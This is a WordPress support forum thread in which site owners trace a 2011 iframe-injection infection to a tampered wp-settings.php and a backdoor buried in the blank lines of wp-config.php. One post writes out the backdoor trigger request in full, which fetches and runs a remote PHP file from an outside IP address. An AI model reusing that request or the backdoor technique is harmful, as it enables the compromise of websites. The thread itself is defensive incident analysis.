My website is Infected with Mass Iframe Injection Attack 2

I scanned your site with https://sitecheck.sucuri.net/scanner/ and it seems all clear. Any way I have no faith in Norton AV.

Nsathees, Thanks for your help. But When I scan online there is no issue but when it is loaded there is an alert “Mass Iframe Injection Attack 2”

Regards
Tina

I found out what the problem was. Please do not install Rss poster free version on your website you will end up getting infected with Mass Iframe Injection Attack 2.

After Installing a fresh update, updating all the plugins and changing the theme I still got the norton alert Mass Iframe Injection Attack 2 when the site was loaded.

I believe this plugin has been infected with the virus and when you uninstall this plugin only than your problem will be solved.

Regards
Tina

Hi & Help!

I built a website with wordpress lastest version and the site is https://www.anchorageradiologist.com and today the account’s antivirussoftware norten symatic alert the user to a “web attack mass iframe injection attack 2”. Two different window based computer were given this warning but I did not see it or a few others window based computers. i was not able to see warning on my mac. I have made sure all my websites have latest version of wordpress and I have updated all my plugins. I downloaded the files and ran them with Panda Antivirus and nothing was detected. The site was uploaded with filzella and my hosting is through 1and1.com.
I have no idea want to do so any comments would be greatly appreciated. Thank you so much!

Stressed to the max

Scott

Hey Scott,

so to my giant surprise I also had this on my web page. Seems the attack was from Yesterday, Nov 3, 2011. I couldn’t really find how they dumped the code in it. But the page that nsathees reported the following code:

[Code moderated as per the Forum Rules. Please use the pastebin]

At this point, I gave up trying to find it. So I login to the admin side directly and did a reinstall of wordpress via the dashboard. Now the page is clean.

The question now is, how did they get in?\
A

UPDATE!

My wp-settings.php was compromised with the following function
https://pastebin.com/YV38tGHE

After a little digging I found the sys_get_temp_dir()= /tmp for me, was storing the file wp_inc which of course contained the bad <script> code.

Hope that helps some of you, I still need to figure out how they got in.
A

Sorry Mod, did not see the rules, here is the link:
https://pastebin.com/YV38tGHE

Thank you so much! Looks like did the trick, do you have any other suggestion to further stop this from occuring in future.

I just had the same issue, Update worked.

Thanks, that saved the rest of my day…

This has effected several of my websites, i would update all of your wordpress sites. I hope wordpress is working on finding how their hacking sites.

Sorry Scott, I am actually just starting to get involved with WordPress and I am not a 100% familiar with all the steps to secure a wordpress install, hopefully someone else can help.

At this point I have modified the permissions on wp-settings.php to only read, that should stop attackers from adding funny functions to my WP but will also stop my WordPress from executing proper updates when run via the Dashboard.

Again, I still need to figure out how they got in and modified my wp-settings in the first place.

A

Could someone please tell me what the “/?pingnow=eval” call does?

I think I found the source of the problem, and how other wordpress are affected, I have the files and will be linking soon, just need to understand what pingnow=eval does.

WordPress Support people, I hope you can find the answer or vulnerability in this post.

What seems to have happened is that one of my wordpress installs was compromised, from where the attacker modified all wp-settings.php files.

Here is the log of the “attack”
https://pastebin.com/dJVztNJ7

From which I got the following files:

pp.txt
just contains an echo echo'test'

tt.txt
https://pastebin.com/gcX19qe2

tt.php
https://pastebin.com/3vXsNLNL

and 99.php or 999.php is
https://pastebin.com/K3yuH2z7
This last file is what causes the overwrite of all wp-settings.php

Also, to add to the odd stuff I found a file named upd.php in wp-content. The file contained this:
https://pastebin.com/1y92Jf0C

Again, if I can find any more information I will post ??

ARG ?? I hate my day right now.. Sorry to the Owner of this post if I may be taking over your original post.

Anyways, I found where “pingnow” is. It seems the install of wordpress was compromised back in August, which cause the wp-config.php file to be modified and leaving a “backdoor”.

I found they wp-config.php contained a copy of the “wp-config-sample.php” plus 40000 lines of code from which most were blank and somewhere in the middle of the file I found this:
https://pastebin.com/h9zXeFN6

Long story, no matter how many times I removed the code from my wp-setttings.php if the permissions are not corrected as well every time someone requested https://blabla.domain/?pingnow=eval&file=https://91.196.216.20/99.php&pass=33e75ff09dd601bbe69f351039152189 all the wp-settings.php for all other installs get modified.

For does of you having this problems, check “ALL” of your wordpress installs, review the wp-config.php file and make sure you modify thet permissions to write on wp-config.php and wp-settings.php.

Hope that helps, I am now really tired ??

Hey there, i went and update all my wordpress files, pretty much took up most of my day. Will this correct the problem or do I need to do additional? The computers that gave the warning now allow the sites to be enter with no problem.